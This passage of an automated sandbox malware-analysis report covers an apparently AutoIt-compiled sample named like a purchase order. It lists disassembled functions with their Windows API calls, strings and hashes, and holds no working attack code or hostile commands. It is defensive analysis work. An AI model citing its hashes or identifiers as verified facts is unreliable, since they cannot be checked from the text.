                                                                    • Instruction Fuzzy Hash: FA915F712043019BCF18EF10C465AAEB7E5EF96354F15846CF8965B3A2CB31ED4AEB41
                                                                    Function 00C9B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C9B8B4
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00C96B11,?), ref: 00C9B910
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B949
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C9B98C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B9C3
                                                                    • FreeLibrary.KERNEL32(?), ref: 00C9B9CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9B9DF
                                                                    • DestroyIcon.USER32(?), ref: 00C9B9EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C9BA0B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C9BA17
                                                                      • Part of subcall function 00C32EFD: __wcsicmp_l.LIBCMT ref: 00C32F86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
                                                                    • Instruction ID: 45fa78c4a3c0d4c07f982e9c38f2af3b21532d82a5603f6231b5c050fe45f044
                                                                    • Opcode Fuzzy Hash: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
                                                                    • Instruction Fuzzy Hash: 5D61FE71910218BAEF24DF64DD49FBE77B8EB08710F10411AF925D60C0DB70AE80E7A0
                                                                    Function 00C7DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00C7DCDC
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C7DCEC
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C7DCF8
                                                                    • __wsplitpath.LIBCMT ref: 00C7DD56
                                                                    • _wcscat.LIBCMT ref: 00C7DD6E
                                                                    • _wcscat.LIBCMT ref: 00C7DD80
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C7DD95
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DDA9
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DDDB
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DDFC
                                                                    • _wcscpy.LIBCMT ref: 00C7DE08
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C7DE47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                    • String ID: *.*
                                                                    • API String ID: 3566783562-438819550
                                                                    • Opcode ID: 18d48853ba0a2bc9dd019dec67ba898f804602acc0599a48ff38de63e22a4437
                                                                    • Instruction ID: b392629b380e3d0de2c21a45e510f8a4b5202fd7cd5a144b8b122e9e8a0a6522
                                                                    • Opcode Fuzzy Hash: 18d48853ba0a2bc9dd019dec67ba898f804602acc0599a48ff38de63e22a4437
                                                                    • Instruction Fuzzy Hash: 4B616B725042059FCB10EF60C855AAEB3F8FF89310F04892EF99AC7251DB31EA45DB92
                                                                    Function 00C79C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00C79C7F
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C79CA0
                                                                    • __swprintf.LIBCMT ref: 00C79CF9
                                                                    • __swprintf.LIBCMT ref: 00C79D12
                                                                    • _wprintf.LIBCMT ref: 00C79DB9
                                                                    • _wprintf.LIBCMT ref: 00C79DD7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 311963372-3080491070
                                                                    • Opcode ID: a4913bf31815c16f618717352460390cf76f04a1499cd793b43c42c5b1168186
                                                                    • Instruction ID: 8dba4f344853c715c94ed2933c9bde84feec76c2bec639d7451ab321344ba181
                                                                    • Opcode Fuzzy Hash: a4913bf31815c16f618717352460390cf76f04a1499cd793b43c42c5b1168186
                                                                    • Instruction Fuzzy Hash: BF518E31900609ABCF14EBE0DD46EEEB778EF15300F604165F519721A2EB316F99EB61
                                                                    Function 00C7A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00C7A3CB
                                                                    • GetDriveTypeW.KERNEL32 ref: 00C7A418
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A460
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A497
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A4C5
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 2698844021-4113822522
                                                                    • Opcode ID: ec1fecdf3120e71fbbbe27ea35ab90abca95e41f7c5fc7824414f1e78bad15d2
                                                                    • Instruction ID: 89550b27f5aa2250e613667c4237c175f1415bf89c88e7b303cb3b00c36ff337
                                                                    • Opcode Fuzzy Hash: ec1fecdf3120e71fbbbe27ea35ab90abca95e41f7c5fc7824414f1e78bad15d2
                                                                    • Instruction Fuzzy Hash: 91513D711082059FC700EF10C8919AFB3F4EF85758F10896DF89957251DB31EE4AEB92
                                                                    Function 00C6F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C6F8DF
                                                                    • LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F8E8
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • GetModuleHandleW.KERNEL32(00000000,00CD5310,?,00000FFF,?,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C6F90A
                                                                    • LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F90D
                                                                    • __swprintf.LIBCMT ref: 00C6F95D
                                                                    • __swprintf.LIBCMT ref: 00C6F96E
                                                                    • _wprintf.LIBCMT ref: 00C6FA17
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C6FA2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 984253442-2268648507
                                                                    • Opcode ID: ee3ccc73bf251547c036d666dd98e8992cd0ff18386ee6069d6aaa56f1b93fa6
                                                                    • Instruction ID: 39451beeaed57cd9860eb90a4b698dac85f336d6459f15d7b629f64980b4ea4b
                                                                    • Opcode Fuzzy Hash: ee3ccc73bf251547c036d666dd98e8992cd0ff18386ee6069d6aaa56f1b93fa6
                                                                    • Instruction Fuzzy Hash: 8D413F7280410DAACF15FBE0DD96EEE7778AF55300F100569F505B6092EB316F4AEB61
                                                                    Function 00C4A8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                    • String ID:
                                                                    • API String ID: 884005220-0
                                                                    • Opcode ID: 50b4924530b0787ee6db5a4561df96563a7a33b103ee1842a1f682f0bfcfbfce
                                                                    • Instruction ID: a0715a37884357a0645b5c776e41b8c913c1ffff7b9c462102ea2865000dded0
                                                                    • Opcode Fuzzy Hash: 50b4924530b0787ee6db5a4561df96563a7a33b103ee1842a1f682f0bfcfbfce
                                                                    • Instruction Fuzzy Hash: A4610472981312AFEB209F24DD0176E77A4FF11361F21411AF811AB1E1EB34DA45DBA3
                                                                    Function 00C9BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00C9BA56
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00C9BA6D
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C9BA78
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C9BA85
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00C9BA8E
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C9BA9D
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00C9BAA6
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C9BAAD
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C9BABE
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CA2CAC,?), ref: 00C9BAD7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00C9BAE7
                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00C9BB0B
                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00C9BB36
                                                                    • DeleteObject.GDI32(00000000), ref: 00C9BB5E
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C9BB74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
                                                                    • Instruction ID: e67ed7f2c89e6b02ce4efa50c488f3368be3b0521528b6d75bc5104128c4dfa6
                                                                    • Opcode Fuzzy Hash: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
                                                                    • Instruction Fuzzy Hash: EF412675600209FFDB119F65ED8CFAEBBB8EB89711F104069F919D62A0C7709E02DB60
                                                                    Function 00C7D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 00C7DA10
                                                                    • _wcscat.LIBCMT ref: 00C7DA28
                                                                    • _wcscat.LIBCMT ref: 00C7DA3A
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C7DA4F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DA63
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00C7DA7B
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C7DA95
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DAA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
                                                                    • Instruction ID: 4cd3e1ce731726fc284a20d631b7b28bb43f820024042983d295488b20e9c90c
                                                                    • Opcode Fuzzy Hash: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
                                                                    • Instruction Fuzzy Hash: EC8171715042419FCB24EF65C844AAAB7F4FF89310F18C82EF99EC7251EA30DA85DB52
                                                                    Function 00C9C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C9C1FC
                                                                    • GetFocus.USER32 ref: 00C9C20C
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00C9C217
                                                                    • _memset.LIBCMT ref: 00C9C342
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C9C36D
                                                                    • GetMenuItemCount.USER32(?), ref: 00C9C38D
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00C9C3A0
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C9C3D4
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C9C41C
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C9C454
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C9C489
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: c49d64c006dadea638bc4c0400bbb19674ae61982fd652974620fd63daed07be
                                                                    • Instruction ID: e9a891c013dd776863cab7bf6421db9ae9c2bee58e07fb96fced2677e1936959
                                                                    • Opcode Fuzzy Hash: c49d64c006dadea638bc4c0400bbb19674ae61982fd652974620fd63daed07be
                                                                    • Instruction Fuzzy Hash: 35817D716083019FDB10CF14C9D8ABBBBE8FB88714F10492EF9A5972A1D770DA05DB62
                                                                    Function 00C8731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00C8738F
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C8739B
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00C873A7
                                                                    • SelectObject.GDI32(00000000,?), ref: 00C873B4
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C87408
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C87444
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C87468
                                                                    • SelectObject.GDI32(00000006,?), ref: 00C87470
                                                                    • DeleteObject.GDI32(?), ref: 00C87479
                                                                    • DeleteDC.GDI32(00000006), ref: 00C87480
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00C8748B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 13f324dcf8db9412cf71ba81a57cc96c2ee2f0f8207d66cdbeafebbf0cc9123a
                                                                    • Instruction ID: 39790185634f21678cd90efcb1246fc586006dd4e7bee62eaa02bed45675a5ba
                                                                    • Opcode Fuzzy Hash: 13f324dcf8db9412cf71ba81a57cc96c2ee2f0f8207d66cdbeafebbf0cc9123a
                                                                    • Instruction Fuzzy Hash: A1513775904309EFCB14DFA9CC89FAEBBB9EF48310F24852EF95997220D731A9418B54
                                                                    Function 00C16A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C16B0C,?,00008000), ref: 00C30973
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C16CFA
                                                                      • Part of subcall function 00C1586D: _wcscpy.LIBCMT ref: 00C158A5
                                                                      • Part of subcall function 00C3363D: _iswctype.LIBCMT ref: 00C33645
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 537147316-1018226102
                                                                    • Opcode ID: 8bf5cc269ad9ad2aa86cb9768a72bc298065be02cfa6a549b956dddbf34f361c
                                                                    • Instruction ID: 8e03579baae72e751186d7be0b9030478015f9d9a5853ef44a953ca8b163d892
                                                                    • Opcode Fuzzy Hash: 8bf5cc269ad9ad2aa86cb9768a72bc298065be02cfa6a549b956dddbf34f361c
                                                                    • Instruction Fuzzy Hash: 79029D31108340DFC724EF24C891AAFBBE5BF96314F14491DF49A972A1DB30DA89EB52
                                                                    Function 00C72D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72D50
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C72DDD
                                                                    • GetMenuItemCount.USER32(00CD5890), ref: 00C72E66
                                                                    • DeleteMenu.USER32(00CD5890,00000005,00000000,000000F5,?,?), ref: 00C72EF6
                                                                    • DeleteMenu.USER32(00CD5890,00000004,00000000), ref: 00C72EFE
                                                                    • DeleteMenu.USER32(00CD5890,00000006,00000000), ref: 00C72F06
                                                                    • DeleteMenu.USER32(00CD5890,00000003,00000000), ref: 00C72F0E
                                                                    • GetMenuItemCount.USER32(00CD5890), ref: 00C72F16
                                                                    • SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C72F4C
                                                                    • GetCursorPos.USER32(?), ref: 00C72F56
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00C72F5F
                                                                    • TrackPopupMenuEx.USER32(00CD5890,00000000,?,00000000,00000000,00000000), ref: 00C72F72
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C72F7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    • Opcode ID: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
